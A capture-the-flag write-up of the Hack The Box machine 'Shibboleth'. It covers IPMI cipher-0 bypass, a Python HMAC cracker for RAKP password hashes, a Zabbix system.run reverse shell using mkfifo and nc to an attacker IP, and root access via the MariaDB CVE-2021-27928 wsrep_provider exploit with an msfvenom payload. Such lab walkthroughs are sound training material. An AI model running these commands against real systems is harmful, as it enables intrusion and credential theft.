Hack The Box Writeup - Shibboleth

Port Enumeration

As always, we start by scanning the target machine’s open ports:

└─$ rustscan -a shibboleth.htb -- -sC -sV -oN port_scan

PORT     STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.41
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: FlexStart Bootstrap Template - Index

The scan shows that only one TCP port is open:

  • Port 80: Apache version 2.4.41

This seemed a bit strange for a medium box, so I also started a UDP port scan in the background:

┌──(kali㉿kali)-[~/HTB/machines/shibboleth]
└─$ sudo nmap shibboleth.htb -sU -p1-10000

In the meantime, let’s have a look at the found port 80.

Port 80

Opening the web application in the browser, we see a marketing website for a company called “FlexStart”.

The website itself does not reveal any useful information, nor does it provide any functionality. The next step therefore is to scan for directories and subdomains.

┌──(kali㉿kali)-[~/HTB/machines/shibboleth]
└─$ feroxbuster -u http://shibboleth.htb -w /usr/share/seclists/Discovery/Web-Content/common.txt 

<lots of assets>

The scan does not reveal any interesting files or directories.

However, we find three subdomains, namely monitor, monitoring and zabbix.

Looking at all three subdomains, we see the same application: a login page for Zabbix.

My current assumption here is that all these subdomains map to the same application.

Zabbix

Zabbix is an enterprise-class open source distributed monitoring solution. Zabbix is software that monitors numerous parameters of a network and the health and integrity of servers, virtual machines, applications, services, databases, websites, the cloud and more. Zabbix uses a flexible notification mechanism that allows users to configure e-mail based alerts for virtually any event. This allows a fast reaction to server problems. Zabbix offers excellent reporting and data visualization features based on the stored data. This makes Zabbix ideal for capacity planning. Zabbix supports both polling and trapping. All Zabbix reports and statistics, as well as configuration parameters, are accessed through a web-based frontend. A web-based frontend ensures that the status of your network and the health of your servers can be assessed from any location. Properly configured, Zabbix can play an important role in monitoring IT infrastructure. This is equally true for small organizations with a few servers and for large companies with a multitude of servers. (https://www.zabbix.com/documentation/5.0/en/manual/introduction/about)

Apparently, this software offers a lot of functionality that might come in handy for obtaining more information about the system. Unfortunately, we need credentials to log in (default passwords like admin:admin don’t work). So, we are stuck again.

Port 623

Remember that we still had a UDP scan running in the background? Well, it finally got some results. There is an open UDP port!

┌──(kali㉿kali)-[~/HTB/machines/shibboleth]
└─$ sudo nmap shibboleth.htb -sU -p1-1000 
623/udp open  asf-rmcp

Port 623 asf-rmcp, hmmmm … never heard of it. Let’s do some research.

(All information taken from https://www.rapid7.com/blog/post/2013/07/02/a-penetration-testers-guide-to-ipmi/)

“Baseboard Management Controllers (BMCs) are a type of embedded computer used to provide out-of-band monitoring for desktops and servers. These products are sold under many brand names, including HP iLO, Dell DRAC, Sun ILOM, Fujitsu iRMC, IBM IMM, and Supermicro IPMI. BMCs are often implemented as embedded ARM systems, running Linux and connected directly to the southbridge of the host system’s motherboard. Network access is obtained either via ‘sideband’ access to an existing network card or through a dedicated interface. In addition to being built-in to various motherboards, BMCs are also sold as pluggable modules and PCI cards. Nearly all servers and workstations ship with or support some form of BMC. The Intelligent Platform Management Interface (IPMI) is a collection of specifications that define communication protocols for talking both across a local bus as well as the network. This specification is managed by Intel and currently comes in two flavors, version 1.5 and version 2.0. The primary goal of Dan Farmer’s research was on the security of the IPMI network protocol that uses UDP port 623. A diagram of the how the BMC interfaces with the system is shown below (CC-SA-3.0 (C) U. Vezzani).”

“BMCs are often under appreciated and overlooked during security audits. Like many embedded devices, they tend to respond slowly to tests and have a few non-standard network services in addition to web-based management. The difference between a BMC and say, a printer, is what you get access to once it has been successfully compromised. The BMC has direct access to the motherboard of its host system. This provides the ability to monitor, reboot, and reinstall the host server, with many systems providing interactive KVM access and support for virtual media. In essence, access to the BMC is effectively physical access to the host system. If an attacker can not only login to the BMC, but gain root access to it as well, they may be able to directly access the i2c bus and Super I/O chip of the host system. Bad news indeed.”

Default usernames and passwords:

Authentication Bypass via Cipher 0

“Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations. It is easy to identify systems that have cipher 0 enabled using the ipmi_cipher_zero module in the Metasploit Framework.”

For this, the username must be guessed correctly, but as seen in the table above, there are only a few options.

┌──(kali㉿kali)-[~/HTB/machines/shibboleth]
└─$ ipmitool -I lanplus -H shibboleth.htb -U Administrator -P test -C 0 user list      
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      USER
2   Administrator    true    false      true       USER

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval

“More recently, Dan Farmer identified an even bigger issue with the IPMI 2.0 specification. In short, the authentication process for IPMI 2.0 mandates that the server send a salted SHA1 or MD5 hash of the requested user’s password to the client, prior to the client authenticating. You heard that right - the BMC will tell you the password hash for any valid user account you request. This password hash can be broken using an offline bruteforce or dictionary attack. Since this issue is a key part of the IPMI specification, there is no easy path to fix the problem, short of isolating all BMCs into a separate network.”

Instead of using the Metasploit module auxiliary/scanner/ipmi/ipmi_dumphashes, I tried to do it manually.

So, the first step is to get the password hash of the user. This should be fairly easy, as the server will send us the hash, once we connect to it. In order to connect, we use a tool called ipmitool.

┌──(kali㉿kali)-[~/HTB/machines/shibboleth]
└─$ ipmitool -I lanplus -H shibboleth.htb -U Administrator -P fluffy-wuffy chassis -vvv

...
<<  Key exchange auth code [sha1] : 0x2996d1ff0b116d7121768c1a543e9fcbe4ca1573

bmc_rand (16 bytes)
 d0 ad d7 34 df f6 07 31 a0 83 54 85 83 a6 6d 62
>> rakp2 mac input buffer (71 bytes)
 a4 a3 a2 a0 04 1a 00 00 b0 29 ff 4b f6 88 90 c8
 c5 d0 f7 da c7 d6 c9 b7 d0 ad d7 34 df f6 07 31
 a0 83 54 85 83 a6 6d 62 a1 23 45 67 89 ab cd ef
 a1 23 45 67 89 ab cd ef 14 0d 41 64 6d 69 6e 69
 73 74 72 61 74 6f 72
>> rakp2 mac key (20 bytes)
 31 32 33 34 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00
>> rakp2 mac as computed by the remote console (20 bytes)
 23 1b f4 75 5d 14 c5 48 37 d4 44 7f 4b 14 e8 c3
 9a a0 c8 5c
> RAKP 2 HMAC is invalid
...

Here, the Key exchange auth code is the HMAC-SHA1 that the BMC computed over the RAKP2 data using the correct password as the key. rakp2 mac input buffer is the data over which the HMAC is computed, and rakp2 mac key is the key, i.e. the password we provided (=1234), zero-padded to 20 bytes.
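
As an added illustration that is not part of the original writeup, the following script splits the captured rakp2 mac input buffer into the fields that RAKP message 2 consists of and recomputes the auth code for candidate passwords. The field offsets follow the IPMI 2.0 RAKP message layout; the function names and the candidate passwords used in the test are my own.

```python
import hmac
from hashlib import sha1

# The 71-byte "rakp2 mac input buffer" printed by ipmitool -vvv above.
RAKP2_INPUT = bytes.fromhex(
    "a4a3a2a0041a0000b029ff4bf68890c8c5d0f7dac7d6c9b7"
    "d0add734dff60731a083548583a66d62"
    "a123456789abcdefa123456789abcdef"
    "140d41646d696e6973747261746f72"
)

def parse_rakp2_input(buf):
    """Split the RAKP message 2 integrity-check input into its fields.
    Every field travels in the clear during session setup; the only secret
    in the HMAC is the key (the user's password), which is why a captured
    auth code can be attacked offline."""
    if len(buf) < 58:
        raise ValueError("buffer too short for a RAKP2 integrity input")
    ulength = buf[57]
    if len(buf) != 58 + ulength:
        raise ValueError("username length byte does not match buffer size")
    return {
        "sid_console": buf[0:4],    # remote console session ID
        "sid_bmc": buf[4:8],        # managed system (BMC) session ID
        "rand_console": buf[8:24],  # 16-byte remote console random
        "rand_bmc": buf[24:40],     # 16-byte BMC random (bmc_rand above)
        "guid_bmc": buf[40:56],     # BMC GUID
        "role": buf[56],            # privilege level; 0x14 = Administrator, name-only lookup
        "ulength": ulength,
        "username": buf[58:].decode("ascii"),
    }

def rakp2_auth_code(buf, password):
    """HMAC-SHA1 over the RAKP2 input keyed with the password, as the BMC
    computes it. HMAC zero-pads keys shorter than the block size, which is
    why ipmitool shows the "rakp2 mac key" padded with 0x00 bytes."""
    return hmac.new(password, buf, sha1).hexdigest()

def recover_password(buf, auth_code, candidates):
    """Return the first candidate whose recomputed auth code matches, else None."""
    for pw in candidates:
        if hmac.compare_digest(rakp2_auth_code(buf, pw), auth_code):
            return pw
    return None

if __name__ == "__main__":
    for name, value in parse_rakp2_input(RAKP2_INPUT).items():
        print(f"{name:>12}: {value.hex() if isinstance(value, bytes) else value}")
```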

To find the correct password, we only have to write a small script that takes each password from a wordlist as the HMAC key and computes the HMAC over the rakp2 mac input buffer. If the generated HMAC matches the one transmitted by the server (the Key exchange auth code), we know that the password is correct.

from hashlib import sha1
import hmac

PASSWORD_FILE_PATH = "/usr/share/wordlists/rockyou.txt"

# rakp2 mac input buffer (everything the BMC HMACs, except the password itself)
raw = bytes.fromhex("a4a3a2a0041a0000b029ff4bf68890c8c5d0f7dac7d6c9b7d0add734dff60731a083548583a66d62a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72")
# Key exchange auth code (the HMAC-SHA1 the BMC sent in RAKP message 2)
correct_hash = "2996d1ff0b116d7121768c1a543e9fcbe4ca1573"

def read_by_line(file_object):
    """Yield one candidate password per line, without the trailing newline.
    The wordlist is read as bytes: rockyou.txt contains lines that are not
    valid UTF-8, and the HMAC key has to be raw bytes anyway. The generator
    ends at EOF instead of looping forever when the password is not found."""
    for line in file_object:
        data = line.rstrip(b"\r\n")
        if data:
            yield data

print("[+] Starting IPMI/RAKP2.0 Cracking")
with open(PASSWORD_FILE_PATH, "rb") as f:
    total = sum(1 for _ in f)  # line count for the progress output
    f.seek(0)
    for index, password in enumerate(read_by_line(f)):
        if index % 50000 == 0:
            print(f"\t... (Password {index}/{total})")
        # The password is the HMAC key; HMAC zero-pads keys shorter than the
        # block size, which matches the padded "rakp2 mac key" ipmitool shows.
        hashed = hmac.new(password, raw, sha1)
        if hashed.hexdigest() == correct_hash:
            print(f"[+] FOUND PASSWORD: {hashed.hexdigest()}:{password.decode(errors='replace')}")
            break
    else:
        print("[-] Password not found in wordlist")
┌──(kali㉿kali)-[~/HTB/machines/shibboleth]
└─$ python3 rakp_ipmi_cracker.py
[+] Starting IPMI/RAKP2.0 Cracking
        ... (Password 0/14344385)
        ... (Password 50000/14344385)
        ... (Password 100000/14344385)
        ... (Password 150000/14344385)
        ... (Password 200000/14344385)
        ...
        ...
        ... (Password 5250000/14344385)
        ... (Password 5300000/14344385)
[+] FOUND PASSWORD: 2996d1ff0b116d7121768c1a543e9fcbe4ca1573:ilovepumkinpie1

There we go! The password for the user Administrator is ilovepumkinpie1. Let’s try to use this password for the Zabbix login.

And it works! We now have access to the Zabbix Dashboard!

Zabbix Dashboard

Reading the documentation of Zabbix reveals that we can add new items in which we can specify commands that should be executed once a particular event occurs. To add a new item, we have to go to Hosts -> Items -> Create Item.

It also tells us that we can run system commands by defining a Zabbix item with the key system.run[command, <mode>]. So let’s try to establish a reverse shell by providing the corresponding system command.

system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.27 4444 >/tmp/f &,nowait]

However, the problem is that we cannot trigger this item as long as we have not assigned it to an event. But … Zabbix provides a Test function with which we can test our newly created item (see screenshot at the very bottom). So in order to get the reverse shell, we first have to start a nc listener on our machine on the port specified in the command, then simply press Test.

Et voilà… we have a shell as user zabbix.

Privilege Escalation

Since we are the zabbix user, we now have full access to all Zabbix application files. The most interesting one is located at /etc/zabbix/zabbix_server.conf. This file contains the complete configuration of Zabbix, including the database password bloooarskybluh and some more information on the database, such as the version 10.3.25-MariaDB-0ubuntu0.20.04.1 (Ubuntu 20.04). (By the way, this password is also the password of the user ipmi-svc, but being logged in as that user is not really required for the privilege escalation.)

Great! So now we can connect to the database with the command mysql -u zabbix -p to look for further information. There is a lot of data here, but nothing that really helps us. Hm….

I then did a quick lookup to see whether this database version is vulnerable. And indeed! According to this documentation, this version has an RCE vulnerability, CVE-2021-27928.

“An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd.” (https://packetstormsecurity.com/files/cve/CVE-2021-27928)

So, by following the described steps we can successfully obtain a root reverse shell:

First, we need the reverse shell payload as a shared library file (run msfvenom on your local machine and then transfer the file to the victim machine via an HTTP server):

ipmi-svc@shibboleth:/tmp$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

Afterwards, we connect to the database and set the wsrep_provider variable, which defines the path to the Galera replication plugin. To exploit this database version, all we have to do is point this path at our reverse shell library. Of course, a nc listener should be running on our attacker machine to receive the callback from the exploit.

ipmi-svc@shibboleth:/tmp$ mysql -u zabbix -p -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'

If everything works, we obtain a reverse shell as root on our machine!

This post is licensed under CC BY 4.0 by the author.